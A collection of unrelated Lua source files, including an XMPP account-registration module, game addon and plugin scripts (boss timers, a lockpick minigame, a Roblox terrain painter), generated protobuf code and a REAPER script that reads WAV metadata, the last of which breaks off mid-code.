-- COPYING file in the source package for more information.
--
local st = require "util.stanza";
local dataform_new = require "util.dataforms".new;
local usermanager_user_exists = require "core.usermanager".user_exists;
local usermanager_create_user = require "core.usermanager".create_user;
local usermanager_delete_user = require "core.usermanager".delete_user;
local nodeprep = require "util.encodings".stringprep.nodeprep;
local additional_fields = module:get_option("additional_registration_fields", {});
local require_encryption = module:get_option_boolean("c2s_require_encryption",
module:get_option_boolean("require_encryption", false));
pcall(function ()
module:depends("register_limits");
end);
local account_details = module:open_store("account_details");
local field_map = {
username = { name = "username", type = "text-single", label = "Username", required = true };
password = { name = "password", type = "text-private", label = "Password", required = true };
nick = { name = "nick", type = "text-single", label = "Nickname" };
name = { name = "name", type = "text-single", label = "Full Name" };
first = { name = "first", type = "text-single", label = "Given Name" };
last = { name = "last", type = "text-single", label = "Family Name" };
email = { name = "email", type = "text-single", label = "Email" };
address = { name = "address", type = "text-single", label = "Street" };
city = { name = "city", type = "text-single", label = "City" };
state = { name = "state", type = "text-single", label = "State" };
zip = { name = "zip", type = "text-single", label = "Postal code" };
phone = { name = "phone", type = "text-single", label = "Telephone number" };
url = { name = "url", type = "text-single", label = "Webpage" };
date = { name = "date", type = "text-single", label = "Birth date" };
};
local title = module:get_option_string("registration_title",
"Creating a new account");
local instructions = module:get_option_string("registration_instructions",
"Choose a username and password for use with this service.");
local registration_form = dataform_new{
title = title;
instructions = instructions;
field_map.username;
field_map.password;
};
local registration_query = st.stanza("query", {xmlns = "jabber:iq:register"})
:tag("instructions"):text(instructions):up()
:tag("username"):up()
:tag("password"):up();
for _, field in ipairs(additional_fields) do
if type(field) == "table" then
registration_form[#registration_form + 1] = field;
elseif field_map[field] or field_map[field:sub(1, -2)] then
if field:match("%+$") then
field = field:sub(1, -2);
field_map[field].required = true;
end
registration_form[#registration_form + 1] = field_map[field];
registration_query:tag(field):up();
else
module:log("error", "Unknown field %q", field);
end
end
registration_query:add_child(registration_form:form());
local register_stream_feature = st.stanza("register", {xmlns="http://jabber.org/features/iq-register"}):up();
module:hook("stream-features", function(event)
local session, features = event.origin, event.features;
-- Advertise registration to unauthorized clients only.
if session.type ~= "c2s_unauthed" or (require_encryption and not session.secure) then
return
end
features:add_child(register_stream_feature);
end);
local function parse_response(query)
local form = query:get_child("x", "jabber:x:data");
if form then
return registration_form:data(form);
else
local data = {};
local errors = {};
for _, field in ipairs(registration_form) do
local name, required = field.name, field.required;
if field_map[name] then
data[name] = query:get_child_text(name);
if (not data[name] or #data[name] == 0) and required then
errors[name] = "Required value missing";
end
end
end
if next(errors) then
return data, errors;
end
return data;
end
end
-- In-band registration
module:hook("stanza/iq/jabber:iq:register:query", function(event)
local session, stanza = event.origin, event.stanza;
local log = session.log or module._log;
if session.type ~= "c2s_unauthed" then
log("debug", "Attempted registration when disabled or already authenticated");
session.send(st.error_reply(stanza, "cancel", "service-unavailable"));
return true;
end
if require_encryption and not session.secure then
session.send(st.error_reply(stanza, "modify", "policy-violation", "Encryption is required"));
return true;
end
local query = stanza.tags[1];
if stanza.attr.type == "get" then
local reply = st.reply(stanza);
reply:add_child(registration_query);
session.send(reply);
return true;
end
-- stanza.attr.type == "set"
if query.tags[1] and query.tags[1].name == "remove" then
session.send(st.error_reply(stanza, "auth", "registration-required"));
return true;
end
local data, errors = parse_response(query);
if errors then
log("debug", "Error parsing registration form:");
local textual_errors = {};
for field, err in pairs(errors) do
log("debug", "Field %q: %s", field, err);
table.insert(textual_errors, ("%s: %s"):format(field:gsub("^%a", string.upper), err));
end
session.send(st.error_reply(stanza, "modify", "not-acceptable", table.concat(textual_errors, "\n")));
return true;
end
local username, password = nodeprep(data.username), data.password;
data.username, data.password = nil, nil;
local host = module.host;
if not username or username == "" then
log("debug", "The requested username is invalid.");
session.send(st.error_reply(stanza, "modify", "not-acceptable", "The requested username is invalid."));
return true;
end
local user = { username = username, password = password, host = host, additional = data, ip = session.ip, session = session, allowed = true }
module:fire_event("user-registering", user);
if not user.allowed then
log("debug", "Registration disallowed by module: %s", user.reason or "no reason given");
session.send(st.error_reply(stanza, "modify", "not-acceptable", user.reason));
return true;
end
if usermanager_user_exists(username, host) then
log("debug", "Attempt to register with existing username");
session.send(st.error_reply(stanza, "cancel", "conflict", "The requested username already exists."));
return true;
end
-- TODO unable to write file, file may be locked, etc, what's the correct error?
local error_reply = st.error_reply(stanza, "wait", "internal-server-error", "Failed to write data to disk.");
if usermanager_create_user(username, password, host) then
data.registered = os.time();
if not account_details:set(username, data) then
log("debug", "Could not store extra details");
usermanager_delete_user(username, host);
session.send(error_reply);
return true;
end
session.send(st.reply(stanza)); -- user created!
log("info", "User account created: %s@%s", username, host);
module:fire_event("user-registered", {
username = username, host = host, source = "mod_register",
session = session });
else
log("debug", "Could not create user");
session.send(error_reply);
end
return true;
end);
|
local Promise = nil
RegisterNUICallback('close', function()
SetNuiFocus(false, false)
if Promise then
Promise:resolve(false)
end
end)
RegisterNUICallback('succeed', function()
SetNuiFocus(false, false)
Promise:resolve(true)
end)
RegisterNUICallback('failed', function()
SetNuiFocus(false, false)
Promise:resolve(false)
end)
RegisterCommand('lockpicktry', function()
local result = exports['lockpick']:startLockpick()
print(result, 'lockpicking result')
end)
exports('startLockpick', function(tries)
SendNUIMessage({
start = true,
tries = tries
})
SetNuiFocus(true, true)
Promise = promise.new()
local result = Citizen.Await(Promise)
return result
end) |
--------------------------------------------------------------------------------
-- Module Declaration
--
local mod, CL = BigWigs:NewBoss("Knight Captain Valyri", 1771, 2099)
if not mod then return end
mod:RegisterEnableMob(127490) -- Knight Captain Valyri
mod.engageId = 2103
mod.respawnTime = 30
--------------------------------------------------------------------------------
-- Initialization
--
function mod:GetOptions()
return {
256970, -- Ignition
256955, -- Cinderflame
257028, -- Fuselighter
}
end
function mod:OnBossEnable()
self:Log("SPELL_CAST_SUCCESS", "Ignition", 256970)
self:Log("SPELL_CAST_START", "Cinderflame", 256955)
self:Log("SPELL_CAST_SUCCESS", "Fuselighter", 257028)
self:Log("SPELL_AURA_APPLIED", "FuselighterApplied", 257028)
end
function mod:OnEngage()
self:Bar(256970, 10) -- Ignition
self:Bar(257028, 17.5) -- Fuselighter
self:Bar(256955, 18) -- Cinderflame
end
--------------------------------------------------------------------------------
-- Event Handlers
--
function mod:Ignition(args)
self:Message2(args.spellId, "yellow")
self:PlaySound(args.spellId, "alert")
self:Bar(args.spellId, 47.5)
end
function mod:Cinderflame(args)
self:Message2(args.spellId, "red", CL.casting:format(args.spellName))
self:PlaySound(args.spellId, "warning")
self:CastBar(args.spellId, 8)
self:Bar(args.spellId, 25)
end
function mod:Fuselighter(args)
self:Bar(args.spellId, 33)
end
function mod:FuselighterApplied(args)
self:TargetMessage2(args.spellId, "yellow", args.destName)
if self:Dispeller("magic") then
self:PlaySound(args.spellId, "alarm", nil, args.destName)
end
end
|
local playsession = {
{"safriq", {514751}},
{"KickassLee", {748545}},
{"loutanifi", {181679}},
{"corbin9228", {1934415}},
{"FallenAngel1010", {375411}},
{"SmaleUp", {1469}},
{"davidbutora", {347039}},
{"raskl", {152763}},
{"Kruv", {429100}},
{"GreySintax", {572168}},
{"sharpshot2566", {638396}},
{"slyboogy", {383753}},
{"Nikkichu", {561911}},
{"dmitrymk", {143338}},
{"l_Diego_l", {5358}},
{"eyepex", {1744906}},
{"J7cuxolor", {199602}},
{"gryph", {729}},
{"Roeno1997", {568957}},
{"MontrealCrook", {780558}},
{"14nickel", {306433}},
{"Spanish", {510958}},
{"Pandarnash", {256401}},
{"Chesssx", {311377}},
{"red11", {533605}},
{"lemarkiz", {4096}},
{"Didier-Sebastien", {202570}},
{"Olekplane1", {90696}},
{"Zory", {549427}},
{"realDonaldTrump", {949218}},
{"zbirka", {1324}},
{"Revar", {25648}},
{"Vivalas", {375235}},
{"grongorcz", {4996}},
{"craigrood", {61224}},
{"Rentaboy", {1213}},
{"MFH", {80913}},
{"Biker", {32628}},
{"Niklasw112", {10565}},
{"TNT_MAN1111", {850156}},
{"adieclay", {340844}},
{"mad58max", {326835}},
{"bhenoa", {482873}},
{"james4560", {80536}},
{"taroxyz", {1479857}},
{"BluJester", {418422}},
{"mgomez", {17133}},
{"UnBoundPage", {597885}},
{"Jestor", {19896}},
{"helic99", {1430432}},
{"TheNetworkDoctor", {281109}},
{"Schallfalke", {339289}},
{"MeggalBozale", {997314}},
{"gebba4", {22045}},
{"Xerochen", {122004}},
{"Gladoo", {35257}},
{"DrinkAlot13", {612850}},
{"Frosty1098", {106769}},
{"jockelpeter", {67484}},
{"brfbrf", {16928}},
{"thrillednation", {4953}},
{"DKarma", {4017}},
{"baden27", {12533}},
{"qwe416416", {89295}},
{"aeaeaeae", {24187}},
{"Boomans", {7829}},
{"xcube", {1180807}},
{"tickterd", {1214822}},
{"Troubletime", {16665}},
{"Reyand", {15346}},
{"Proodmore", {37223}},
{"xPedion", {9785}},
{"Dysonhive", {16878}},
{"Gerkiz", {5066}},
{"Dofolo", {2249}},
{"Corbon", {4849}},
{"brftjx", {5361}},
{"MuddledBox", {334670}},
{"StormBreaker", {811992}},
{"Beans_Man_2", {355481}},
{"CrazyAmphibian", {407}},
{"mewmew", {269398}},
{"dmackattack12", {9201}},
{"jagger23", {380095}},
{"chilldude.uk", {583292}},
{"svartakon", {82316}},
{"Idefix88", {17986}},
{"TheNegronMan", {13084}},
{"Menander", {14843}},
{"Ed9210", {279850}},
{"skatordude", {211742}},
{"cadil", {1933}},
{"BubblesAndSuch", {394534}},
{"matthew1206", {43318}},
{"50fffff", {187902}},
{"steve3024", {91762}},
{"Cokezero91", {11366}},
{"LegionMammal978", {255902}},
{"poz8866", {8067}},
{"Mr.AsianEngineer", {9409}},
{"Gas1", {13539}},
{"Mselvage1231", {85906}},
{"mypoutine", {21657}},
{"100JP001", {6769}},
{"Shucru", {5377}},
{"moocat12", {27716}}
}
return playsession |
---@meta
resty_lock={}
function resty_lock.expire(self, time) end
function resty_lock.unlock(self) end
function resty_lock.new(_, dict_name, opts) end
resty_lock._VERSION="0.08"
function resty_lock.lock(self, key) end
return resty_lock |
-- Generated By protoc-gen-lua Do not Edit
local protobuf = require "protobuf/protobuf"
local TOWERRECORD_PB = require("TowerRecord_pb")
module('TowerRecord2DB_pb')
TOWERRECORD2DB = protobuf.Descriptor();
local TOWERRECORD2DB_RECORDS_FIELD = protobuf.FieldDescriptor();
local TOWERRECORD2DB_M_UPDATETIME_FIELD = protobuf.FieldDescriptor();
local TOWERRECORD2DB_USERESETCOUNT_FIELD = protobuf.FieldDescriptor();
TOWERRECORD2DB_RECORDS_FIELD.name = "records"
TOWERRECORD2DB_RECORDS_FIELD.full_name = ".KKSG.TowerRecord2DB.records"
TOWERRECORD2DB_RECORDS_FIELD.number = 1
TOWERRECORD2DB_RECORDS_FIELD.index = 0
TOWERRECORD2DB_RECORDS_FIELD.label = 3
TOWERRECORD2DB_RECORDS_FIELD.has_default_value = false
TOWERRECORD2DB_RECORDS_FIELD.default_value = {}
TOWERRECORD2DB_RECORDS_FIELD.message_type = TOWERRECORD_PB.TOWERRECORD
TOWERRECORD2DB_RECORDS_FIELD.type = 11
TOWERRECORD2DB_RECORDS_FIELD.cpp_type = 10
TOWERRECORD2DB_M_UPDATETIME_FIELD.name = "m_updateTime"
TOWERRECORD2DB_M_UPDATETIME_FIELD.full_name = ".KKSG.TowerRecord2DB.m_updateTime"
TOWERRECORD2DB_M_UPDATETIME_FIELD.number = 2
TOWERRECORD2DB_M_UPDATETIME_FIELD.index = 1
TOWERRECORD2DB_M_UPDATETIME_FIELD.label = 1
TOWERRECORD2DB_M_UPDATETIME_FIELD.has_default_value = false
TOWERRECORD2DB_M_UPDATETIME_FIELD.default_value = 0
TOWERRECORD2DB_M_UPDATETIME_FIELD.type = 5
TOWERRECORD2DB_M_UPDATETIME_FIELD.cpp_type = 1
TOWERRECORD2DB_USERESETCOUNT_FIELD.name = "useResetCount"
TOWERRECORD2DB_USERESETCOUNT_FIELD.full_name = ".KKSG.TowerRecord2DB.useResetCount"
TOWERRECORD2DB_USERESETCOUNT_FIELD.number = 3
TOWERRECORD2DB_USERESETCOUNT_FIELD.index = 2
TOWERRECORD2DB_USERESETCOUNT_FIELD.label = 1
TOWERRECORD2DB_USERESETCOUNT_FIELD.has_default_value = false
TOWERRECORD2DB_USERESETCOUNT_FIELD.default_value = 0
TOWERRECORD2DB_USERESETCOUNT_FIELD.type = 5
TOWERRECORD2DB_USERESETCOUNT_FIELD.cpp_type = 1
TOWERRECORD2DB.name = "TowerRecord2DB"
TOWERRECORD2DB.full_name = ".KKSG.TowerRecord2DB"
TOWERRECORD2DB.nested_types = {}
TOWERRECORD2DB.enum_types = {}
TOWERRECORD2DB.fields = {TOWERRECORD2DB_RECORDS_FIELD, TOWERRECORD2DB_M_UPDATETIME_FIELD, TOWERRECORD2DB_USERESETCOUNT_FIELD}
TOWERRECORD2DB.is_extendable = false
TOWERRECORD2DB.extensions = {}
TowerRecord2DB = protobuf.Message(TOWERRECORD2DB)
|
local path = require 'path'
return function( args )
-- Check for script file name
if not args[ 0 ] then
error( 'Lua script missing' )
end
-- Resolve full path to the Lua script
args[ 0 ] = path.realpath( args[ 0 ] )
-- Add the Lua script folder to the Lua path
--local dir = path.split( args[ 0 ] )
--package.path = package.path .. ';' .. dir .. '/?.lua'
-- Run the script
local chunk = loadfile( args[ 0 ] )
local main = chunk()
return main( args )
end
|
supplyLimit("Corvette",50)
supplyLimit("Frigate",300)
supplyLimit("Capital",130)
supplyLimit("Platform",18)
|
local module = {}
local inputService = game:GetService("UserInputService")
local positionX = math.huge
local positionZ = math.huge
local material = 1376
local size = 4
module.Initiate = function()
local mouse = _G.plugin:GetMouse()
local connection1 = nil
local connection2 = nil
local connection3 = nil
local widgetButton = _G.classes["WidgetButton"].New("Paint", "rbxassetid://3078999048", 3)
local widgetPage = _G.classes["WidgetPage"].New()
local dataGroup = _G.classes["Group"].New("Data")
widgetPage:AddChild(dataGroup.gui)
local materialsOption = _G.classes["Materials"].New(material)
dataGroup:AddChild(materialsOption.gui)
materialsOption.event:Bind(function(value)
material = value
materialsOption:Select(value)
end)
local sizeOption = _G.classes["Number"].New("Size", size, {["minimum"] = 0, ["round"] = 0})
dataGroup:AddChild(sizeOption.gui)
sizeOption.event:Bind(function(value)
size = value
end)
local functionsGroup = _G.classes["Group"].New("Functions")
widgetPage:AddChild(functionsGroup.gui)
local saveOption = _G.classes["Button"].New("Save Material Data")
functionsGroup:AddChild(saveOption.gui)
saveOption.event:Bind(function()
local selection = game.Selection:Get()[1]
if selection == nil then return end
for i, child in ipairs(selection:GetChildren()) do
if child.Name ~= "MaterialData" then continue end
if child.ClassName ~= "Folder" then continue end
if child:GetAttribute("Data") ~= "Material" then continue end
child:Destroy()
end
local chunkSize = 64
local folder = Instance.new("Folder")
folder.Name = "MaterialData"
folder:SetAttribute("Data", "Material")
folder.Parent = selection
local datas = {}
for x, v in pairs(_G.modules["Terrain"].materialData) do
for z, material in pairs(v) do
local chunkX = math.floor(x / chunkSize)
local chunkZ = math.floor(z / chunkSize)
local lx = x - chunkX * chunkSize
local lz = z - chunkZ * chunkSize
if datas[chunkX] == nil then datas[chunkX] = {} end
local data = datas[chunkX][chunkZ]
if data == nil then
data = {}
datas[chunkX][chunkZ] = data
data.script = Instance.new("ModuleScript")
data.buffer = {}
table.insert(data.buffer, 'return {\n')
end
if data.x ~= lx then
if data.x ~= nil then table.insert(data.buffer, '},\n') end
table.insert(data.buffer, lx)
table.insert(data.buffer, ',{')
data.x = lx
else
table.insert(data.buffer, ',')
end
table.insert(data.buffer, lz)
table.insert(data.buffer, ',')
table.insert(data.buffer, material)
end
end
for chunkX, v in pairs(datas) do
for chunkZ, data in pairs(v) do
table.insert(data.buffer, '},\n}')
data.script.Name = chunkX .. "," .. chunkZ
data.script:SetAttribute("Position", Vector2.new(chunkX * chunkSize, chunkZ * chunkSize))
data.script.Source = table.concat(data.buffer)
data.script.Parent = folder
end
end
end)
local loadOption = _G.classes["Button"].New("Load Material Data")
functionsGroup:AddChild(loadOption.gui)
loadOption.event:Bind(function()
local selection = game.Selection:Get()[1]
if selection == nil then return end
if selection.ClassName ~= "Folder" then return end
if selection:GetAttribute("Data") ~= "Material" then return end
for i, child in ipairs(selection:GetDescendants()) do
if child.ClassName ~= "ModuleScript" then continue end
local func = loadstring(child.Source)
if typeof(func) ~= "function" then return end
local data = func()
if typeof(data) ~= "table" then return end
local position = child:GetAttribute("Position")
for i = 1, #data, 2 do
local x = position.X + data[i]
local zData = data[i + 1]
if _G.modules["Terrain"].materialData[x] == nil then _G.modules["Terrain"].materialData[x] = {} end
for j = 1, #zData, 2 do
local z = position.Y + zData[j]
local material = zData[j + 1]
_G.modules["Terrain"].materialData[x][z] = material
end
end
end
end)
local clearEditDataOption = _G.classes["Button"].New("Clear Material Data")
functionsGroup:AddChild(clearEditDataOption.gui)
clearEditDataOption.event:Bind(function()
_G.modules["Terrain"].materialData = {}
end)
local clearTerrainOption = _G.classes["Button"].New("Clear Terrain")
functionsGroup:AddChild(clearTerrainOption.gui)
clearTerrainOption.event:Bind(function()
_G.modules["Terrain"].Clear()
end)
local clearAllTerrainOption = _G.classes["Button"].New("Clear All Terrain")
functionsGroup:AddChild(clearAllTerrainOption.gui)
clearAllTerrainOption.event:Bind(function()
_G.modules["Terrain"].ClearAll()
end)
widgetButton:Activated(function()
widgetButton:Select()
widgetPage:Show()
end)
widgetButton.selected:Bind(function()
_G.plugin:Activate(true)
connection1 = mouse.Button1Down:Connect(function()
if mouse.Target == nil then return end
local x = math.floor(mouse.Hit.Position.X / 4)
local z = math.floor(mouse.Hit.Position.Z / 4)
positionX, positionZ = x, z
_G.modules["Terrain"].Paint(x, z, size, material)
local connectionUp = nil
local connectionMove = nil
connectionUp = mouse.Button1Up:Connect(function()
connectionUp:Disconnect()
connectionMove:Disconnect()
end)
connectionMove = mouse.Move:Connect(function()
if mouse.Target == nil then return end
local x = math.floor(mouse.Hit.Position.X / 4)
local z = math.floor(mouse.Hit.Position.Z / 4)
if positionX == x and positionZ == z then return end
positionX, positionZ = x, z
_G.modules["Terrain"].Paint(x, z, size, material)
end)
end)
connection2 = mouse.WheelBackward:Connect(function()
if inputService:IsKeyDown(Enum.KeyCode.LeftControl) == true then
sizeOption:Set(size - 1)
end
end)
connection3 = mouse.WheelForward:Connect(function()
if inputService:IsKeyDown(Enum.KeyCode.LeftControl) == true then
sizeOption:Set(size + 1)
end
end)
end)
widgetButton.deselected:Bind(function()
if connection1 ~= nil then connection1:Disconnect() connection1 = nil end
if connection2 ~= nil then connection2:Disconnect() connection2 = nil end
if connection3 ~= nil then connection3:Disconnect() connection3 = nil end
end)
end
return module
|
--[[
ReaScript Name:ReaOpen
Author: LKC,JerContact
REAPER: 5+
Extensions: SWS
Version: 1.80
Provides:
ReaOpen.exe
ReaOpen MAC.zip
ReaOpen.rpp
install_wwise_command_for_pc.bat
[Main] ReaOpen - Init Setup.lua
[Main] ReaOpen - Open script directory.lua
About:
ReaOpen is a free lightweight program that allows you to select an audio file and open its original REAPER project with ease.
It works both on Windows and Mac and can be integrated into Wise, Explorer/Finder and REAPER itself.
It is a mod of another script called Open project from clipboard by JerContact.
]]
--[[
* Changelog:
* v1.80 (2021-02-21)
+ PC: Added logic for reaper_exe_path - improves portability
* v1.75 (2019-04-15)
+ Fixed issue with regular (appdata) REAPER installation on PC
* v1.74 (2019-03-07)
+ Fixed error with region name parsing
* v1.73 (2019-03-02)
+ Fixed error with init setup
* v1.72 (2019-02-27)
+ Updated ReaOpen.rpp file
* v1.71 (2019-02-27)
+ Added bat file for installing command on PC
+ Removed Assets folder from ReaOpen.rpp project settings
* v1.70 (2018-12-05)
+ Deleted bat for installing command in wwise, for simplicity
+ Added open script directiory action
* v1.60 (2018-10-13)
+ wGroups metadata support
+ Fixed reading binary wavs with sub character
* v1.55 (2018-10-13)
+ ReaOpen - Init Setup.lua to action list
* v1.54 (2018-10-13)
+ ReaOpen Init Setup v1.0 script added
* v1.53 (2018-10-08)
+ Script to install ReaOpen command in Wwise 2018.1.2
* v1.52 (2018-10-07)
+ Fix Mac select tab problem
* v1.51 (2018-10-07)
+ New mac build
* Changelog:
* v1.50 (2018-10-07)
+ Changed the name of package to ReaOpen
* v1.44 (2018-10-07)
+ file:read fix for case when binary is not in just one line
* v1.43 (2018-09-10)
+ Metadata parse character changed to semicolon (;) instead of colon(,)
+ Reawwiser.exe icon
* v1.42 (2018-09-10)
+ PC version of ReaWwiser opens normal instead of template project
* v1.41 (2018-09-08)
+ New ReaWwiser MAC.zip file
* v1.40 (2018-09-08)
+ Regions support
+ Template moved to app folder
* v1.33 (2018-09-07)
+ Mac icon
* v1.32 (2018-09-07)
+ Added zip with MAC app
* v1.31 (2018-09-07)
+ Changelog and indexing fix
* v1.30 (2018-09-07)
+ ReaWwiser OSX support
* v1.20 (2018-09-06)
+ Fixed selecting tabs when multiple projects are opened
+ Replaced whitespaces with tabs
+ Reindented the file
+ Added support for metadata items in reaper (everything after comma in item name will be ignored)
* v1.17 (2018-07-13)
+ Loading improved, no ui refresh
* v1.16 (2018-06-24)
+ Rename package files and name
* v1.15 (2018-06-22)
+ Script and all files renamed
* v1.10 (2018-06-22)
+ FIX: Gets Active Item Take, not first take
* v1.0 (2018-06-22)
+ Initial Commit
]]
--NIKOLALKC INTRO
--METAPARSE CHAR = ;
function Msg(param)
reaper.ShowConsoleMsg(tostring(param).."\n")
end
--ENUM PROJECT
TempProject, projfn = reaper.EnumProjects( -1, "" )
function open_or_select_tab()
open=1
proj=0
subproj=0
while subproj do
subproj, projname = reaper.EnumProjects(proj, "NULL")
if projname==n1 then
project=subproj
open=0
break
end
proj=proj+1
end
if open==1 then
-- Msg("Open Project: "..tostring(n1))
reaper.Main_OnCommand(40859, 0) --new project tab
reaper.Main_openProject(n1)
else
-- Msg("Select Project: "..tostring(project))
reaper.SelectProjectInstance(project)
end
end
--CHECK IF REGION - NIKOLALKC
function isRegion(position,file_name)
result = false
retval, num_markers, num_regions = reaper.CountProjectMarkers( 0 )
all_markers_count = num_markers + num_regions
potential_match_regions = {}
match_count = 0
--go thru all regsion
-- Msg("QUERY:"..file_name)
for i = 0, all_markers_count-1 do
local retval, isrgn, pos, rgnend, name, markrgnindexnumber = reaper.EnumProjectMarkers( i )
if isRegion then
local delta_pos = pos - position
if delta_pos < 0 then delta_pos = delta_pos * (-1) end
--odvoj svaku regiju koja ima isto ime
--izbaci space iz imena regije, da bi moglo da se uporedi sa file_name-om koji nema space-ove
name = string.gsub (name, "\n", "") --remove newlines
name = string.gsub (name, "\r", "") --remove newlines
name = string.gsub(name, "% ", "") -- remove spaces
-- Msg(name)
if file_name == name then
potential_match_regions[name] = pos
match_count = match_count + 1
end
end
end
--FIND CLOSEST REGION
if match_count > 0 then
smallest_delta = nil
final_region_name = nil
for k,v in pairs(potential_match_regions) do
if smallest_delta == nil then --calculate init delta
smallest_delta = v - position
if smallest_delta < 0 then smallest_delta = smallest_delta * (-1) end --take absolute value
final_region_name = k
else
local delta = v - position
if delta < 0 then delta = delta * (-1) end --take absolute value
if delta < smallest_delta then
smallest_delta = delta
final_region_name = k
end
end
end
end
--determine results
if final_region_name ~= nil then
return potential_match_regions[final_region_name]
else
return false
end
end
--CSV PARSER
function ParseCSVLine (line,sep)
local res = {}
local pos = 1
sep = sep or ','
while true do
local c = string.sub(line,pos,pos)
if (c == "") then break end
if (c == '"') then
-- quoted value (ignore separator within)
local txt = ""
repeat
local startp,endp = string.find(line,'^%b""',pos)
txt = txt..string.sub(line,startp+1,endp-1)
pos = endp + 1
c = string.sub(line,pos,pos)
if (c == '"') then txt = txt..'"' end
-- check first char AFTER quoted string, if it is another
-- quoted string without separator, then append it
-- this is the way to "escape" the quote char in a quote. example:
-- value1,"blub""blip""boing",value3 will result in blub"blip"boing for the middle
until (c ~= '"')
table.insert(res,txt)
assert(c == sep or c == "")
pos = pos + 1
else
-- no quotes used, just look for the first separator
local startp,endp = string.find(line,sep,pos)
if (startp) then
table.insert(res,string.sub(line,pos,startp-1))
pos = endp + 1
else
-- no separator found -> use rest of string and terminate
table.insert(res,string.sub(line,pos))
break
end
end
end
return res
end
--ORIGINAL SCRIPT STARTS HERE--------------------------------------------------------------------------------------------------------------------
--description Open project based on file in clipboard
--version 1.3
--author JerContact
--about
-- # open-project-based-on-file-in-clipboard
-- If you copy the full pathname of the file, this script will open the corresponding reaper project associated with that file based
-- on the bwf metadata inside the .wav file (to get to this to work you'll need to render out .wav files from reaper and have
-- the "Include project filename in BWF data" checked. This script first figures out the timecode location of that file imbedded
-- inside the .wav file, and tries to find the item around that location. If the file is in the project but has moved timecode there
-- will be a warning message box telling you so. If the project is opened but the item is not longer in the project, you'll get
-- and error saying the item is no longer there. If there is no metadata in you .wav file, no project will be loaded.
--changelog
-- + 1.3 - adding a little feature to make this work with files named with .wav at the end inside reaper.
reaper.PreventUIRefresh(1)
weallgood=0
filetxt = reaper.CF_GetClipboard("")
m, n = string.find(filetxt, ".wav")
if m~= nil then
test = string.find(filetxt, '"')
if test==1 then
testlength = string.len(filetxt)
test = string.sub(filetxt, testlength)
test = string.find(filetxt, '"')
if test==1 then
filetxt = string.sub(filetxt, 2, testlength-1)
end
end
--reaper.ShowMessageBox(filetxt, "", 1)
filetxt = string.sub(filetxt, 1, (m+3))
filetxt = tostring(filetxt)
wavfile = filetxt
-- f = io.input(filetxt)--old and buggy - escapes SUB character
local f = assert(io.open(filetxt, "rb"))--new and even more sexy LKC edit
a=f:read("*all") --new and sexy lkc edit
-- Msg("PRINT FILE:")
-- Msg(a)
-- Msg("PRINT LINE:")
-- local count = 1
-- while true do
-- local line = io.read()
-- if line == nil then break end
-- Msg(tostring(count).." "..line)
-- count = count + 1
-- end
n1 = a
m, n = string.find(n1, "RPP:")
f:close()
if m~=nil then
n1 = string.sub(n1, (m+4))
m, n = string.find(n1, ".RPP")
n1 = string.sub(n1, 1, n)
filenametemp=n1
m=0
m, n = string.find(filenametemp, ".rpp")
if m~=nil then
filenametemp = string.sub(filenametemp, 1, n)
end
n1=filenametemp
-- Msg(n1)
open_or_select_tab()
m=0
if reaper.GetOS() == "Win32" or reaper.GetOS() == "Win64" then
separator = "\\"
else
separator = "/"
end
while (m~=nil) do
m, n = string.find(filetxt, separator)
if m==nil then
break
end
filetxt = string.sub(filetxt, m+1)
end
m, n = string.find(filetxt, ".wav")
filetxt = string.sub(filetxt, 1, m-1)
-- Msg(filetxt)
--function get_path_bwf_data(var_path)
--retval, var_path = reaper.GetUserFileNameForRead("", "Select SRT file", "wav")
var_path = wavfile
pcm_source = reaper.PCM_Source_CreateFromFile(var_path)
pcm = reaper.GetMediaSourceSampleRate(pcm_source)
local fo=0, opchn
opchn = io.open(var_path, "rb") -- open take's source file to read binary
bext_found =false
if opchn ~= false then
riff_header = opchn:read(4) -- file header
file_size_buf = opchn:read(4) -- file_size as string
file_size = string.unpack ("<I4", file_size_buf) -- unpack file_size as unsigned integer, LE
fo=fo+8
wave_header = opchn:read(4)
fo=fo+4
while not bext_found and fo< file_size do
chunk_header = opchn:read(4)
chunk_size_buf = opchn:read(4)
chunk_size = string.unpack ("<I4", chunk_size_buf) -- unpack chunk_size as unsigned integer, LE
fo=fo+8
if chunk_header ~="bext" then
opchn:seek ("cur", chunk_size) -- seek beyond chunk
else
-- gfx.printf("chunk header:<%s> chunk size:<%s>", chunk_header, chunk_size)
-- gfx.x=10 gfx.y=gfx.y+gfx.texth
bext_found =true -- *set to flat var, calling functions set to tables*
chunk_data_buf = opchn:read(chunk_size) -- import chunk data as string
-- process chunk_data_buf
bext_Description = string.sub(chunk_data_buf, 1, 256)
bext_Originator = string.sub(chunk_data_buf, 256+1, 256+32)
bext_OriginatorReference = string.sub(chunk_data_buf, 256+32+1, 256+32+32)
bext_OriginationDate = string.sub(chunk_data_buf, 256+32+32+1, 256+32+32+10)
bext_OriginationTime = string.sub(chunk_data_buf, 256+32+32+10+1, 256+32+32+10+8) -- left these "open" to show the obvious structure
bext_TimeRefLow_buf = string.sub(chunk_data_buf, 256+32+32+10+8+1, 256+32+32+10+8+4) -- SMPTE codes and LUFS data follow these
bext_TimeRefHigh_buf = string.sub(chunk_data_buf, 256+32+32+10+8+4+1, 256+32+32+10+8+4+4) -- see EBU Tech 3285 v2 etc for more details.
bext_VersionNum_buf = string.sub(chunk_data_buf, 256+32+32+10+8+4+4+1, 256+32+32+10+8+4+4+2) --
--gfx.printf("LCDbuf:%d LD:%s OD:%s OT:%s LTRLbuf:%d LTRHbuf:%d", #chunk_data_buf, #bext_Description, bext_OriginationDate, bext_OriginationTime, #bext_TimeRefLow_buf, #bext_TimeRefHigh_buf)
--gfx.x=10 gfx.y=gfx.y+gfx.texth
-- I stopped here, but the full set of bext metadata can be retrieved -PM me for further details/help -planetnin
bext_TimeRefLow = string.unpack ("<I4", bext_TimeRefLow_buf) -- unpack chunk_size as unsigned integer (4-bytes)
bext_TimeRefHigh = string.unpack ("<I4", bext_TimeRefHigh_buf) -- unpack chunk_size as unsigned integer (4-bytes)
bext_VersionNum = string.unpack ("<i2", bext_VersionNum_buf) -- unpack chunk_size as signed integer (2-bytes)
-- combine high & low bytes & sample rate, save offset to table for this bwf_take
ret_bso = ((bext_TimeRefHigh*4294967295) + bext_TimeRefLow)/pcm--/reaper.GetMediaSourceSampleRate(reaper.GetMediaItemTake_Source(var_path)) --==> for offset in seconds
--ret_bso = reaper.format_timestr_pos(ret_bso, chunk_data_buf, 4)
-- *inner function returns to flat variables, "take" and "render" function add to table*
end
fo=fo+chunk_size
end
opchn:close() -- close file
else
bext_found = false
ret_bso = 0
end
reaper.PCM_Source_Destroy(pcm_source)
